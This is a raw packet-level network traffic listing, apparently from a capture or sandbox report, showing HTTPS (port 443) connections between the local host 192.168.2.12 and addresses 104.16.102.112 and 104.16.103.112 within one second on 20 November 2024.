                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.096652985 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.096652985 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.096681118 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.099319935 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.101367950 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.101387978 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.102777004 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.102797985 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.115329027 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.117430925 CET49809443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.117453098 CET44349809104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.118055105 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.118110895 CET49809443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.118710995 CET49809443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.118727922 CET44349809104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.120352030 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.120412111 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.121021032 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.121057987 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.121102095 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.123271942 CET49810443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.123301029 CET44349810104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.123878002 CET49810443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.123882055 CET49793443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.123908043 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.124371052 CET49810443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.124383926 CET44349810104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.127758026 CET49793443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.129043102 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.137130976 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.137605906 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.139003038 CET49793443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.139025927 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.139594078 CET49793443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.144963980 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.148015976 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.149454117 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.150661945 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.150691986 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.153588057 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.157912016 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.161169052 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.162520885 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.162554026 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.163070917 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.167299032 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.167320967 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.167356968 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.169584036 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.169586897 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.169603109 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.169974089 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.172199965 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.172301054 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.173264980 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.173463106 CET49789443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.173480988 CET44349789104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.173547983 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.174446106 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.179814100 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.183760881 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.185065031 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.185085058 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.185691118 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.189352989 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.193162918 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.194725990 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.194765091 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.198587894 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.200779915 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.200818062 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.204646111 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.205027103 CET49793443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.205867052 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.205887079 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.210870981 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.214159012 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.216376066 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.216419935 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.218285084 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.220428944 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.223092079 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.232887030 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.232938051 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.241056919 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.246145010 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.246190071 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.255987883 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.256016016 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.256129980 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.256156921 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.256345034 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.274835110 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.274868965 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.277733088 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.277756929 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.291340113 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.292249918 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.299773932 CET49793443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.299803972 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.325876951 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.325931072 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.327011108 CET49793443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.327037096 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.336416960 CET49793443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.336433887 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.337641001 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.337933064 CET49793443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.337939978 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.340146065 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.340172052 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.341883898 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.341901064 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.353776932 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.353822947 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.356378078 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.356384039 CET49793443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.356411934 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.356544018 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.356570959 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.362728119 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.366489887 CET49793443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.366502047 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.366520882 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.366539001 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.367295027 CET49793443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.367306948 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.371016979 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.373964071 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.373990059 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.374933958 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.374953985 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.375083923 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.378638983 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.378863096 CET49793443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.378891945 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.387716055 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.387753963 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.387779951 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.393009901 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.393081903 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.399081945 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.399081945 CET49793443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.399101019 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.399106979 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.399734020 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.399872065 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.399898052 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.400223017 CET49793443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.400228977 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.400254965 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.400264025 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.400971889 CET49793443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.402215004 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.402215004 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.406313896 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.409535885 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.409554958 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.410701990 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.410703897 CET49793443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.410708904 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.410722017 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.411257029 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.416209936 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.416229010 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.417784929 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.417794943 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.422017097 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.424022913 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.424041986 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.433366060 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.433387995 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.435025930 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.466615915 CET49793443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.466631889 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.523396015 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.525806904 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.526004076 CET49793443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.526015043 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.531013012 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.535326958 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.535351038 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.535459995 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.540150881 CET49793443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.540158987 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.540160894 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.540172100 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.540446043 CET49793443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.540465117 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.540622950 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.540630102 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.540699005 CET49793443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.542771101 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.542792082 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.543076992 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.543085098 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.547820091 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.547859907 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.547861099 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.547868013 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.556755066 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.556771040 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.558103085 CET49793443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.558125973 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.558139086 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.558475018 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.558485031 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.561449051 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.561475992 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.567504883 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.567656994 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.567665100 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.570321083 CET49793443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.570322037 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.570331097 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.570333958 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.572494030 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.572504044 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.572545052 CET49793443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.572554111 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.572565079 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.572577953 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.572629929 CET49793443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.572645903 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.572861910 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.573600054 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.573609114 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.573642015 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.574249029 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.574258089 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.575109959 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.576550961 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.576642036 CET49793443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.576649904 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.576720953 CET49793443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.579879999 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.579900980 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.580158949 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.580168009 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.580358028 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.582118988 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.585459948 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.585468054 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.585617065 CET49793443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.589960098 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.589967966 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.594974995 CET49793443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.598716974 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.598726988 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.599236965 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.599435091 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.599445105 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.600029945 CET49793443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.601404905 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.601501942 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.601809025 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.607948065 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.612454891 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.616697073 CET49793443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.616714001 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.620341063 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.628566980 CET44349793104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:44.631519079 CET49793443192.168.2.12104.16.102.112
